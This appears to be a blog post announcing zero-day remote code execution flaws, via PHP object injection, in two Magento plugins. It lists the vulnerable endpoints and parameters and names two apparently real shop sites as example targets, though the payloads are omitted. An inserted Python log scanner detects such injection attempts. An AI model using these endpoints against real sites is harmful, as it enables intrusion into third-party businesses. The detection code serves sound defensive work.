2 0day RCE Magento Plugin exploits

in cybersecurity •  7 years ago 

Hello. Now I want to present two exploitable Magento plugins.

Vuln type: RCE
Method: RCE via PHP Object Injection
The HTTP GET parameter is base64-encoded; just decode it and check the payload. It's really easy. The example payloads call exit('MazaYana').

  1. ajaxproducts
    /index.php/ajaxproducts/index/index/?params=<base64 payload omitted>

Example: https://tintenzeile.de/index.php/ajaxproducts/index/index/?params=<base64 payload omitted>

  2. qquoteadv
    /index.php/qquoteadv/download/downloadCustomOption/?id=<base64 payload omitted>

Example: http://onestopworkwear.com/index.php/qquoteadv/download/downloadCustomOption/?id=<base64 payload omitted>
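As an added defender-side example, not from the original post: a Python detector that walks access-log lines, base64-decodes query parameters such as params and id, and flags any value that decodes to a serialized PHP object (the O:<len>:"Class" head that unserialize() turns into an object). The log lines and payloads are constructed; the object stub borrows only the Zend_Log class name that heads the page's payload and carries no working chain.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Head of a serialized PHP object, the shape unserialize() instantiates: O:<len>:"<Class>":<n>:{
PHP_OBJECT_RE = re.compile(rb'O:\d+:"([A-Za-z0-9_\\]+)":\d+:\{')
# Request target of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_b64_param(value):
    """Decode a query value as base64; None if it is not base64 at all."""
    value = value.replace(" ", "+")    # parse_qs turns a raw '+' into a space
    value += "=" * (-len(value) % 4)   # tolerate padding stripped by the client
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None

def php_object_classes(blob):
    """Class names of every serialized PHP object in blob, in order of appearance."""
    return [m.group(1).decode("ascii") for m in PHP_OBJECT_RE.finditer(blob)]

def scan_request(target):
    """Map each query parameter that carries a serialized PHP object to its class names."""
    findings = {}
    for name, values in parse_qs(urlsplit(target).query).items():
        for value in values:
            classes = php_object_classes(decode_b64_param(value) or b"")
            if classes:
                findings.setdefault(name, []).extend(classes)
    return findings

def scan_log(lines):
    """(line_no, path, findings) for every log line whose request looks like object injection."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and (findings := scan_request(m.group(1))):
            hits.append((no, urlsplit(m.group(1)).path, findings))
    return hits

# Constructed samples: a Zend_Log object stub (class name from the page's payload; no writers, not a working chain), a plain array, and an ordinary request.
OBJECT_PARAM = base64.b64encode(b'O:8:"Zend_Log":1:{s:8:"_writers";a:0:{}}').decode()
ARRAY_PARAM = base64.b64encode(b'a:1:{s:3:"sku";s:6:"ABC123";}').decode()
SAMPLE_LOG = [
    f'203.0.113.5 - - [01/Jan/2018:10:00:00 +0000] "GET /index.php/ajaxproducts/index/index/?params={OBJECT_PARAM} HTTP/1.1" 200 512',
    f'203.0.113.6 - - [01/Jan/2018:10:00:01 +0000] "GET /index.php/qquoteadv/download/downloadCustomOption/?id={ARRAY_PARAM} HTTP/1.1" 200 77',
    '203.0.113.7 - - [01/Jan/2018:10:00:02 +0000] "GET /index.php/catalog/product/view/id/42 HTTP/1.1" 200 9001',
]
```

Any hit is worth an alert whatever the class name, since a request parameter should never carry a serialized object; on the application side the fix is to stop calling unserialize() on request data, or at minimum to pass ['allowed_classes' => false] (PHP 7+) so no object can be instantiated from it.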

If you copy this info, please link to this article, thanks.

Wallets for donation:
BTC 13mq6pQNvPTdaEk4RsNfCfb7yM4ixBEifM
ETH 0x8061bb5d617dd8958680a9ab900b29cf65a2608b

Thanks, your NullByte.

